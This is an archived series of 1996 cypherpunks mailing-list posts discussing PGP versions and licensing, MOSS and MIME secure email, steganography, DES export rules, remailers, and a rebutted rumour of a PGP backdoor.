Content-Type: text/plain


At 8:19 PM 2/27/96, Blake Ramsdell wrote:
>> Further there is a good implementation of MOSS.
>
>Is there a version that can be used in commercial applications?  There is for
>PGP, S/MIME, and (I think) for MSP.

Beauty is in the eyes of the beholder I'm told.

TIS will happily license their source code to you.  In this case you get
the advantage of seeing and actually trying what you will get in advance
with no hassle whatsoever.  As to whether that is a better choice than
writing the code yourself, well, you get the idea.

Jim

----------------------------------------------------------------------------
James M. Galvin                                               galvin@eit.com
VeriFone/EIT, PO Box 220, Glenwood, MD 21738                 +1 410.795.6882






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: galvin@eit.com (James M. Galvin)
Date: Thu, 29 Feb 1996 01:22:45 +0800
To: BKnowles@aol.net
Subject: Re: RE: [ Death of MOSS? ]
Message-ID: <v02140b20ad5a0a8da1cd@[153.37.6.9]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:44 AM 2/28/96, Brad Knowles wrote:
>    And if you look at what I've said previously, it is my firm belief
>that if we are to succeed in giving users a truly interoperable secure
>email standard, then said standard must be fully and completely
>integrated into MIME and do everything it does in the proper MIME way,
>as opposed to just being security grafted on.

Allow me to make a contentious statement:

        MOSS is the only secure email protocol integrated with MIME.

You see, integrated to me means that the base is security aware.  MIME is
only security aware when the security multiparts are used.  In all other
cases, MIME is not security aware.

The use of the application content-type with experimentally defined
subtypes gives the appearance of MIME being security aware, but it provides
nothing more than a mechanism for carrying a protected object.  In
addition, the fact that the security service itself must do a callback in
order to support recursive services, unlike MOSS which uses the security
multiparts framework and thus lets MIME do all the work it was designed to
do, further supports my position.

Jim

----------------------------------------------------------------------------
James M. Galvin                                               galvin@eit.com
VeriFone/EIT, PO Box 220, Glenwood, MD 21738                 +1 410.795.6882






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Gimon <gimonca@skypoint.com>
Date: Thu, 29 Feb 1996 02:20:38 +0800
To: cypherpunks@toad.com
Subject: Re: Internet shutdown Feb 29? (fwd)
Message-ID: <Pine.SV4.3.91.960228094621.20422A-100000@mirage>
MIME-Version: 1.0
Content-Type: text/plain



Brief article on last summer's Minnesota outage is available
at http://www.info-nation.com/burnin.html . There's a link
in there (I think it still works) to a local IRC log of
U of M people trading info during the blackout.


 ***********************************************************************
        --The Interview--             | gimonca@skypoint.com
 George Clinton: "Suck on my soul,    | Minneapolis MN USA
 and I will lick your funky emotions!"| http://www.skypoint.com/~gimonca
 Dave Letterman: "Yuck!!"             | A lean, mean meme machine.
 ***********************************************************************

---------- Forwarded message ----------
Date: Wed, 28 Feb 1996 08:11:36 -0600 (CST)
From: Kevin L Prigge <Kevin.L.Prigge-2@tc.umn.edu>

A few months back, some winos took most of Minnesota off the net
for a couple days. Upset with being kicked out from under a bridge,
they started a fire that took out the main fiber cable from 
downtown to MRNet + the U of M. Backup? Due to a mistake at a CO,
the backup link was routed thru the same area, and was also burned.
Interesting scrambling as nameservers puked and died.  







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bruce Zambini <jlasser@rwd.goucher.edu>
Date: Thu, 29 Feb 1996 10:56:34 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: Simpler solutions (was Re: Stealth PGP work)
In-Reply-To: <199602280910.BAA29788@ix10.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.960228102319.16512A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Feb 1996, Bill Stewart wrote:

> One point of stealth-pgp is to make an encrypted message you _can_
> safely hide with stego.  Since the Bad Guys can take your stegofied picture,
> destego it, and see the string ------ BEGIN PGP CONTRABAND DATA,
> you can't get away with saying "no, that's just a picture of my cat,
> blurred a bit because he was moving", which you can if you use a true
> stealth version of PGP or other crypto program.

Or, you can develop a public-key stego system...

ie a stego system that uses bits in specific ways depending on the 
private key of the recipient.

Something I've been thinking about, but haven't quite figured out how to 
do yet, except that one could use certain bits based on a PRNG and begin 
the message with an RSA-encrypted seed (ie the first X bits will be the 
seed, encrypted with your public PGP key).

(If anyone actually wants to code this, lemme know...)

Jon Lasser
----------
Jon Lasser (410)494-3072                         - Obscenity  is a crutch  for
jlasser@rwd.goucher.edu                            inarticulate motherfuckers.
http://www.goucher.edu/~jlasser/
Finger for PGP key (1024/EC001E4D)               - Fuck the CDA.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 29 Feb 1996 02:13:23 +0800
To: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Subject: Re: ViaCryptPGP 4.0?! (was Re: PGP integrated into Z-Mail)
In-Reply-To: <199602280417.XAA11930@UNiX.asb.com>
Message-ID: <199602281532.KAA10186@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Odd. I remember a prototype API spec being posted to c'punks last 
> year.  (Or was that something else?)

What you saw was a prior incarnation of PGP3.  What we have does look
farily similar to that old spec.  But I think that the new spec is a
lot easier to understand and use.  Hopefully the spec will get to a
state where it can be released for public consumption really soon.

> And, what does this have to do with ViaCrypt PGP 4.0? Would it be 3.0 
> compatible or is it something entirely different?

I dont know.  I dont work for ViaCrypt, and they have been fairly
secretive in their work.  For all I know, they've made ViaCrypt PGP
4.0 completely incompatible with PGP 2.6.2 and PGP3.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Thu, 29 Feb 1996 02:22:48 +0800
To: cypherpunks@toad.com
Subject: But liars sure can...
Message-ID: <960228104510.2022bd44@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


I rote:
>>Finally, no cost is allocated to the sustem required to program/evaluate
>>the ponderings of these 100's of ASICs. As anyone who has ever programmed
>>a massively parallel computer (which is what they are talking about in their
>>brute force machine, it is the boundary communications that kill you.

Bill wreplied:
>And the Inmos Transputer, with its 4 communications channels, would do
>just fine as well - you could either build the things into large grids
>or build a large ternary tree, or get fancy and build cubes of 6 chips
>that you make hypercubes out of, or whatever.  A modern version of the same
>chip, built out of FPGAs or ASICs with enough memory and program on chip,
>would blaze just fine.

Oh I agree it *can* be done (thouse who follow RISKS and SCI.CRYPT will note
that I was talking about cascadable single bit boolean processors and DSPs
for brute force engines several years ago. We seem to be miscommunicating
a bit though. I agree that such an engine is easier to design than something 
like a MASPAR or Alliance since each set of kerchunkers can operate 
independantly once started and all that is necessary is to be able to
signal success and pass the found code.

Still, the logistics of initializing each processor set (and ones I have
dealt with have primarily been matricies of single bit devices), providing
communications, power, and control is a non-trivial task: once you have
a general purpose ASIC, you are only half way there, particularly if it is
to be usable for more than one fixed algorithm/key length.

Will further stipulate that a single PC (8088 even) would probably be 
sufficient to load/start/retrieve data from such a beast but design of the
I/O would still need to be accomplished. Not difficult, just necessary.

My point was not that it couldn't be done, but that the costs mentioned
were probably off by a factor of at least two and that for a 40 bit code,
setup for each run would probably take longer than the cracking ( assuming
a court order from Podunk could even get in the queue for a U$300 million
device in an even more expensive facility - students in a University will
*always* be able to do things faster/cheaper than a corporation/government).

Doing something *once* is a lot different from putting it into production.

						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Thu, 29 Feb 1996 02:35:48 +0800
To: Mike Ingle <inglem@adnetsol.com>
Subject: Re: PGP to PC mail integration
Message-ID: <v02130512ad5a3523bcd0@[204.215.243.59]>
MIME-Version: 1.0
Content-Type: text/plain


At 12:18 AM 2/28/96, you wrote:

>Instead of messing with user interfaces, you set the POP and SMTP
>addresses of your mail program to "localhost". You run locally a Visual
>Basic program that sits on ports 110 (POP) and 25 (SMTP) listening for
>connections. The VB program is configured with the addresses of your
>real SMTP and POP servers, and acts as a proxy.
>
>When your mail program retrieves POP mail, it goes through the VB
>program, and the VB program decrypts any PGP mail it sees. When it
>sends mail, the VB program encrypts any mail it has a PGP key for the
>recipient of.
>
>Once this is set up, the user burden is near zero, and it works with
>any winsock-based mail program. What do you think of the idea?

Brilliant.

You could even set it up so that it also proxies your smtp out going, and
compares each destination to a list of people you want to automatically
encrypt to.  I suggest a list because while you may have some people's keys
in your keyring, for a variety of reasons they may not want to receive
trivial pgp mail.

Joseph Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
PGP 2048bit-Fingerprint: F8 A2 A5 15 56 42 9B 16  3F BD 57 0F 8A ED E3 21
No man's life, liberty or property are safe while the legislature is in session.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cs.berkeley.edu>
Date: Thu, 29 Feb 1996 05:39:39 +0800
Subject: DES hooks in Linux kernel
Message-ID: <3134C356.4771A55A@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


(aeb@cwi.nl is included, as he seems to be the last person to have
touched loop.c before it was put into the standard Linux kernel sources,
but I may be wrong.)

The file loop.c, included in recent Linux kernel sources, includes calls
to DES routines, such as:

#ifdef DES_AVAILABLE
static int transfer_des(struct loop_device *lo, int cmd, char *raw_buf,
                  char *loop_buf, int size)
{
<snip>
                        des_ecb_encrypt((des_cblock *) tmp,(des_cblock*)
                            loop_buf,lo->lo_des_key,DES_ENCRYPT);
<snip>
}
#endif

AFAIK, the presence of these hooks (even if surrounded by the ifdef's)
makes this file illegal to export from the United States.  Its presence
on ftp sites in the US could get someone in trouble.

   - Ian "this ITAR thing is really silly..."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Corey Minter" <cminter@mipos2.intel.com>
Date: Thu, 29 Feb 1996 06:59:22 +0800
To: pp@pfawww.pp.se (Per Persson)
Subject: Re: new "obscenity" law on the net
In-Reply-To: <y3yivgzk3z6.fsf@ojnk.bahnhof.se>
Message-ID: <199602282112.NAA09059@zws388.sc.intel.com>
MIME-Version: 1.0
Content-Type: text/plain


> "Ben A. Mesander" <ben@gnu.ai.mit.edu> writes:
> 
> >Just curious - will the new law outlawing obscenity on the net in the us
> >cause you to make changes to some of the comments in the emacs source code?
> 
> Some weeks ago, Lars and Richard went through the Gnus source and
> removed 'fuck' two times and 'fucking' one time (if I didn't get it
> all wrong). I wonder if that's your fault.

what if I had written some code which doesn't function properly unless
certain indecent words were in the source code and then put the code
on the WWW :).  Would that violate Congress' Despotic Action? 

What if when you looked at the text on a 80 column screen and because
of line wrap it said something indecent otherwise it was
unintelligible?  It seems that no reasonable person would go after a
person for that but then aren't we talking about selective
enforcement.

F T C                                                                           U H D                                                                           C E A                                                                           K





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Bainter <Mark@adspp.com>
Date: Thu, 29 Feb 1996 06:59:03 +0800
To: cypherpunks@toad.com
Subject: PGP backdoor?  (No, I'm not paranoid.)
Message-ID: <3134C779.7C84@adspp.com>
MIME-Version: 1.0
Content-Type: text/plain


I was recently speaking with a newly-made aquaintence, and we were 
discussing the merits of various encryption systems.  Now, I had heard
about all the people who claimed the reason versions later than 2.3 
wouldn't work with 2.3 was because of a backdoor for the government.  I 
personally thought they were being paranoid.  However, this guy tells me 
that he met Phil at defcon and phil told him that he co-operated with 
the government and gave them information that would enable them to crack 
key's for versions later than 2.3.   I don't know whether to believe him 
or not, as I said earlier he is not a long-time friend or anything, so he 
could just be lying to me.  If anyone has any information on this I would 
appreciate it.

---
"Man did not enter into society to become 
 worse than he was before, nor to have 
 fewer rights than he had before, but
 to have those rights better secured." 
             --- Thomas Paine 1791

>>My key is on the keyservers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "A. Padgett Peterson P.E. Information Security" <PADGETT@hobbes.orl.mmc.com>
Date: Thu, 29 Feb 1996 03:49:56 +0800
To: cypherpunks@toad.com
Subject: PGP 3.0/4.0
Message-ID: <960228142224.2022b01c@hobbes.orl.mmc.com>
MIME-Version: 1.0
Content-Type: text/plain


Subj:	Re: ViaCryptPGP 4.0?! (was Re: PGP integrated into Z-Mail) 

For those who have joined us recently, PGP v 2.6x is essentially free for
individual use under MIT's (and the gov's) exemption/permission for the
use of patents helt at the moment by PKP/Cylink/RSA (not even going to
get into that mess).

For commercial use a license to use the RSA and IDEA components is
necessary through fate or some such ViaCrypt obtained such a license
before PGP became a Big Thing and with Phil's blessing formed a commercial
unit to distribute what is called ViaCrypt PGP.

Because of what I do, I spent the money to purchse the first product,
ViaCrypt PGP v2.4 (PGP 2.3 analogue). In due course, when PGP v2.5 and
2.6x came out, Viacrypt followed suit with v2.7 and then 2.71 for Windows
and I upgraded.

Because the next "public" release is scheduled to be 3.0, the next ViaCrypt
which will include the corporate featured (with escrow capability) Business
Edition will be known as 4.0 with versions for PC, Mac, Unix, and VMS.

Both 2.7 and what I have seen of 4.0 (not released yet) have a switch that
allows backwards compatability if desired (know back to 2.3, not sure about
earlier ones).

The most compelling features of 4.0 are the floating toolbar or "Enclyptor"
which allows use inside any Windoze program that supports cut & paste (have
used it inside a Telnet session with a remote host and inside ccMail) and
the "group" feature.

Have no connection with Viacrypt other than knowing some of the people and
"putting my money where my mouse is".

						Warmly,
							Padgett




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sean A. Walberg" <umwalber@cc.UManitoba.CA>
Date: Thu, 29 Feb 1996 06:37:26 +0800
To: cypherpunks@toad.com
Subject: Using PGP for pseudo random numbers?
Message-ID: <199602282140.PAA13970@electra.cc.umanitoba.ca>
MIME-Version: 1.0
Content-Type: text/plain


How does one use the RNG in PGP?  I thought that

pgp +makerandom=5000 would spit out a bunch of data, but I seem to be 
mistaken.

Sean
       =================] Will work for RAM [==================
       |     Sean A. Walberg       | PGP key |  C programmers |
       |  Computer Engineering ][  |   on    |    do it in    |
       | umwalber@cc.umanitoba.ca  | servers |   libraries!   |
       =============] http://www.escape.ca/~sean [=============




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 29 Feb 1996 06:14:25 +0800
To: Mark Bainter <Mark@adspp.com>
Subject: Re: PGP backdoor? (No, I'm not paranoid.)
In-Reply-To: <3134C779.7C84@adspp.com>
Message-ID: <199602282127.QAA16379@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mark Bainter writes:
> I was recently speaking with a newly-made aquaintence, and we were 
> discussing the merits of various encryption systems.  Now, I had heard
> about all the people who claimed the reason versions later than 2.3 
> wouldn't work with 2.3 was because of a backdoor for the government.  I 
> personally thought they were being paranoid.  However, this guy tells me 
> that he met Phil at defcon and phil told him that he co-operated with 
> the government and gave them information that would enable them to crack 
> key's for versions later than 2.3.   I don't know whether to believe him 
> or not, as I said earlier he is not a long-time friend or anything, so he 
> could just be lying to me.  If anyone has any information on this I would 
> appreciate it.

Your informant is taking extremely good drugs. You should find out who
his connection is should you want to get any.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 29 Feb 1996 06:52:35 +0800
To: cypherpunks@toad.com
Subject: "Physical Reality II"
Message-ID: <2.2.32.19960228213546.00682c64@panix.com>
MIME-Version: 1.0
Content-Type: text/plain



Bad Boys, Bad Boys
Whatcha gonna do? 
Whatcha gonna do when they come for you? 
Bad Boys, Bad Boys

repeat endlessly.

We did 1) & 2) yesterday.  Here are some more points.

3)  There must be a reason for them to come "for you".  They need motivation.

As people go through their ordinary day-to-day lives, they do a lot of
things that weaken government control mechanisms without directly
confronting them.  The whole development of modern capitalism, the modern
finance markets, and the modern telecoms environment are examples of the
wild flowers of individual power growing up in the garden of the state
economy.  

Note that governments used to control wages, prices, interest rates, and
capital flows.  In the US, we had Regulation Q which capped the interest
rates banks and S&Ls could pay.  Ownership of gold by Americans was banned.
Most European countries had strict exchange controls as did most of the 3rd
world.  Computers which made money market mutual funds possible and
telecommunications which made rapid funds transfer possible ended most of
these controls without any violent confrontations.  If you are borrowing
"overnight funds" from Tokyo, it's a little difficult to seize them because
they disappear at midnight.  If a restriction is easy to bypass, it tends to
die.  Controls on capital flows have died because the holders of capital
don't have to pay attention to those controls.

The first phase of the electronic revolution freed the large financial
institutions that could afford to play the international funds transfer
game.  Retail electronic funds transfer will free everybody else.

Now this liberation of money may not seem to mean much but if money is free,
it results in other freedoms.  It is hard to control people who have control
of their own funds.  They can just move on you.

Obviously, the ease of creating artificial entities and the use of some of
the privacy protecting tools pioneered by cypherpunks can play a role in
hiding out from the Bad Boys as well.  Everything that makes a target harder
to find reduces the number of hits.  Louis Freeh complained during the great
net kiddie porn bust of 1995 that some of the perps had encrypted their
files and this made them harder to prosecute.

In general, the sheer growth of business and communications makes it much
harder to identify investigatory targets.  As markets, networks, and
communications double and then double again, the Bad Boys have too much
territory to search.  They get spread too thin. 

<More Tomorrow> 

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 29 Feb 1996 09:49:45 +0800
To: daw@cs.berkeley.edu
Subject: Re: fun with the web and security
In-Reply-To: <9602280905.AA16242@espresso.CS.Berkeley.EDU.mammoth>
Message-ID: <Pine.SOL.3.91.960228164915.1974D-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 28 Feb 1996, David A Wagner wrote:

> > This has been discussed a lot in the URI working groups since around 92. 
> > I think it's actually documented in the RFC
> 
> Really?  Could you give me any pointers to read up on?
> 
> I searched extensively at www.w3.org, and I did find the following
> excerpt in RFC1738 under Security Considerations:

> 
> I don't think this addresses exactly the same thing I was talking
> about-- I'm talking about a way to exploit arbitrary security holes,
> even against machines (normally) protected inside a firewall.
> 
> could still be exploited-- Ian has discovered a way to send arbitrary
> email messages with arbitrary headers to arbitrary hosts by abusing
> the mailto: URL, which should be sufficient to exploit several sendmail
> 
> So was that what you were talking about, or was there more discussion?

This is roughly  what was talked about; I seem to remember DEBUG being 
discussed with this (it's the one that takes the least typing). The URI WG 
often got so tedious and repetetitive I may have been unconscious and 
dreaming it :-)

Simon

---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Thu, 29 Feb 1996 07:41:55 +0800
To: Derek Atkins <warlord@MIT.EDU>
Subject: Re: ViaCryptPGP 4.0?! (was Re: PGP integrated into Z-Mail)
Message-ID: <199602282222.RAA15759@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



Derek Atkins <warlord@MIT.EDU> writes:

> > And, what does this have to do with ViaCrypt PGP 4.0? Would it be 3.0 
> > compatible or is it something entirely different?
> 
> I dont know.  I dont work for ViaCrypt, and they have been fairly
> secretive in their work.  For all I know, they've made ViaCrypt PGP
> 4.0 completely incompatible with PGP 2.6.2 and PGP3.

I would have thought you and Colin would have some communication with 
Phil regarding PGP3, since PGP is his trademark.

The web page referred to it as being in beta, so maybe they are 
working with the old specs... could also be that they completely 
rewrote and improved on the old version.

(Of course if I have questions I should address them to ViaCrypt...)


 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 29 Feb 1996 07:46:19 +0800
To: umwalber@cc.UManitoba.CA
Subject: Re: Using PGP for pseudo random numbers?
In-Reply-To: <199602282140.PAA13970@electra.cc.umanitoba.ca>
Message-ID: <199602282221.RAA17997@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


try:
	pgp +makerandom=5000 out.bin

I.e., give it an output filename.  Also, what version of PGP are you
using?  This feature wasn't added until 2.6.2

-derek

> How does one use the RNG in PGP?  I thought that
> 
> pgp +makerandom=5000 would spit out a bunch of data, but I seem to be 
> mistaken.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Thu, 29 Feb 1996 10:26:23 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk remailer
In-Reply-To: <427.6632T768T557@eniac.campus.luth.se>
Message-ID: <199602290134.RAA04291@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: cypherpunks@toad.com]
[Subject: Re: Cypherpunk remailer]
[In-reply-to: Your message of Wed, 28 Feb 96 13:06:19 N.]
             <427.6632T768T557@eniac.campus.luth.se>

johan@eniac.campus.luth.se (Johan Sandberg) requested:
>How do I send Email through a cypherpunk remailer?
>There might be some FAQs about this, but never seen one.
> -- Please refer to where I can get the FAQ if there is one! --

There is a FAQ about anonymous remailers by
<A HREF="http://www.well.com/user/abacard/remail.html>Andre Bacard</A>.

Personally, I found it assumed knowledge I didn't have, and it didn't
help me find it either. Read it first and I'll be happy to answer
questions if you still can't get started.

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMTT3yIHskC9sh/+lAQGpEQQAjw7m7u/a88QFVsCGMzN2/GUqzaCez37V
uSZibcRZdKRMjaMD/Mk1WEJSdF8fC/goVbZKzm0tN+nS2K0GNj5n5BkIAIfJvh8t
N9/owTxgE9oDLLf25OIdNqOuNdwo0Dchb3h1mrtivPXGzYhnSK4CPgRDBrhJpfMQ
cuI4HTddlmU=
=du+4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Atkins <warlord@MIT.EDU>
Date: Thu, 29 Feb 1996 08:00:30 +0800
To: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Subject: Re: ViaCryptPGP 4.0?! (was Re: PGP integrated into Z-Mail)
In-Reply-To: <199602282222.RAA15759@UNiX.asb.com>
Message-ID: <199602282242.RAA18760@toxicwaste.media.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


> I would have thought you and Colin would have some communication with 
> Phil regarding PGP3, since PGP is his trademark.

Colin and I have been speaking to Phil.  That doesn't mean that I have
any idea what ViaCrypt is doing.  Perhaps Phil and ViaCrypt should
talk?  If there is a problem with ViaCrypt 4.0, it is between Phil and
ViaCrypt.

> The web page referred to it as being in beta, so maybe they are 
> working with the old specs... could also be that they completely 
> rewrote and improved on the old version.

I have nothing to do with ViaCrypt.  I dont know anything about their
products.  I don't know what they have or plan to have in their 4.0
version.  I dont know what spec they are using.  I dont know what new
data structures they have created.

-derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Thu, 29 Feb 1996 20:37:12 +0800
To: Mark Bainter <Mark@adspp.com>
Subject: Re: PGP backdoor? (No, I'm not paranoid.)
In-Reply-To: <3134C779.7C84@adspp.com>
Message-ID: <199602290142.RAA04520@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: Mark Bainter <Mark@adspp.com>]
[cc: cypherpunks@toad.com]
[Subject: Re: PGP backdoor? (No, I'm not paranoid.) ]
[In-reply-to: Your message of Wed, 28 Feb 96 13:22:01 PST.]
             <3134C779.7C84@adspp.com> 

>I was recently speaking with a newly-made aquaintence, and we were 
>discussing the merits of various encryption systems.  Now, I had heard
>about all the people who claimed the reason versions later than 2.3 
>wouldn't work with 2.3 was because of a backdoor for the government.  I 
>personally thought they were being paranoid.  However, this guy tells me 
>that he met Phil at defcon and phil told him that he co-operated with 
>the government and gave them information that would enable them to crack 
>key's for versions later than 2.3.   I don't know whether to believe him 
>or not, as I said earlier he is not a long-time friend or anything, so he 
>could just be lying to me.  If anyone has any information on this I would 
>appreciate it.

Utter rubbish. You can look at the source code and easily convince
yourself that there is no backdoor. I have personally done this for the
key generation bit, and I know others who have done it for the
on-the-fly encryption. Also, 2.6ui (old version) was based on 2.3 and
interoperated fine -- it had no back doors.

What 2.6 *did* have was a built-in incompatibility with old versions, in
an attempt to make people upgrade to a version which got Phil out of
some patent-raleted hot water.

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMTT9GoHskC9sh/+lAQE7FwP/dD9cN6e+g7Oji0STXHWqykfJQikQ/mrT
AjQIRuomGQ+ce+R3grZcFKcvNcn8iDg5czV/K+F5Ix2apSrssnKCs0xPst1a2MD1
iWGnxP2QbkjSMfr9YziF7WBUAQCYQwM2zKrDPKF7n8u2F4MvNCbgtL1pmzCiYlOq
jN1G7EyXNpk=
=ln+P
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC, Canada))
Date: Thu, 29 Feb 1996 08:16:31 +0800
To: cypherpunks@toad.com
Subject: Re: PGP backdoor? (No, I'm not paranoid.)
Message-ID: <9602282303.AA01822@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


perry@piermont.com wrote:
>
>Mark Bainter writes:
<snip>
>> However, this guy tells me 
>> that he met Phil at defcon and phil told him that he co-operated with 
>> the government and gave them information that would enable them to crack 
>> key's for versions later than 2.3.   I don't know whether to believe him 
>> or not,

>Your informant is taking extremely good drugs. You should find out who
>his connection is should you want to get any.
>
>Perry

Dear Perry,

many peoples hear many things.  The difficult part is to figure out what
is the validity of what ones hears.  I personnally heard a things or two,
even if I am not involved in any way in the trade of crypto.  I heard them
through outside channels, completely independently from any crypto-activist, wether pro or con (CPunks et al or Govt).  Theses sources are of utmost
qualifications.  Wether or not there is a "vast conspiracy" either to make
us believe that, for an example, PGP *is* or *is not* crackable we *do not*
know.  Every side have vested interests.   Many opinions that PGP is secure
rest on *actual* evaluation of our computing capabilities, actual or 
forecasted.  And experts are *very often* wrong.  Have a look at history 
of sciences... You'll realize that most accomplishments were held as
impossible even shortly before they were discovered/created.  Such is the
history of intra-abdominal surgery, of space flight and of many other
knowledge and/or technology.

In most instances of life, it is much wiser to realize that *we do not know*
and accepting ignorance as such rather than adopting the first tempting
rationalization that comes to mind.  Because in the former case, you still
have the possibility to enhance life by learning, while in the second, you
can only hope that you did not adopt a wrong belief that will eventually
cost you dearly.

Remember, when an ostrich puts it's head in the sand, which part of it's
anatomy it is showing to the world...

So, why waste bandwith with a post that apparently mainly seems to be aimed
at dismissing somebody but brings *absolutely no* new knowledge to 
the discussion?  Please, next time, post privately.  

Funny jokes are, IMHO,  welcome because they have some life-enhancing value. 

So please, at least be funny...

Your post makes me wonder for what terribly conspiring organisation 
are you working for...

JFA
The collectivists be DAMNED!
**** OLD KEY: DO NOT USE ANYMORE UNLESS FOR VERIFYING SIGNATURES ****

1024 bits Key ID:57214AED 1995/10/04 Jean-Francois Avon <jf_avon@citenet.net>
Key fingerprint =  84 96 76 AE EB 7C AB 15  88 47 87 B0 18 31 74 9F 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 29 Feb 1996 20:38:51 +0800
To: cypherpunks@toad.com
Subject: "Louis Freeh is a Cocksucker"
Message-ID: <199602290201.SAA01927@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


I have seen this meme scrawled on the sides of payphones and on train doors
along the Red Line of Chicago's "Ell."  Is this some form of organized  
protest or the actions of one person?  While not directly cypherpunks related  
I cannot think of too many other types of people who would produce this  
graffito.

Any responsible cypherpunks care to raise their hands?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 29 Feb 1996 08:30:59 +0800
To: jf_avon@citenet.net (Jean-Francois Avon (JFA Technologies, QC,   Canada))
Subject: Re: PGP backdoor? (No, I'm not paranoid.)
In-Reply-To: <9602282303.AA01822@cti02.citenet.net>
Message-ID: <199602282325.SAA16557@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jean-Francois Avon (JFA Technologies, QC, Canada) writes:
> 
> many peoples hear many things.  The difficult part is to figure out what
> is the validity of what ones hears.  I personnally heard a things or two,
> even if I am not involved in any way in the trade of crypto.  I heard them
> through outside channels, completely independently from any crypto-activist, 
> wether pro or con (CPunks et al or Govt).  Theses sources are of utmost
> qualifications.  Wether or not there is a "vast conspiracy" either to make
> us believe that, for an example, PGP *is* or *is not* crackable we *do not*
> know.

Whether there is a conspiracy to convince people to believe things
about PGP or not, there is no need to take PGP's characteristics on
faith. You can get out the source code and read it.

> Many opinions that PGP is secure rest on *actual* evaluation of our
> computing capabilities, actual or forecasted.  And experts are *very
> often* wrong.  Have a look at history of sciences... You'll realize
> that most accomplishments were held as impossible even shortly
> before they were discovered/created.

No change in algorithms occurred between PGP 2.3 and later versions,
so any claim that it was made breakable at that point cannot be made
on the basis that computing power is somehow now able to crack it when
it could not do so before.

> So, why waste bandwith with a post that apparently mainly seems to be aimed
> at dismissing somebody but brings *absolutely no* new knowledge to 
> the discussion?  Please, next time, post privately.  

I'm sorry, but I am bringing knowledge to the discussion. It is my
personal knowledge that PGP was built as well as the people who built
it knew how, and that it is believed to be free from major flaws by
them and those who have examined it. I do not believe that PGP is
totally bug free, and a subtle flaw in, say, the PRNG, or some other
spot, is not impossible. However, no such flaws were put in place
deliberately, and if such flaws exist they have escaped the notice of
literally hundreds of people examining the source code for problems.

Perry




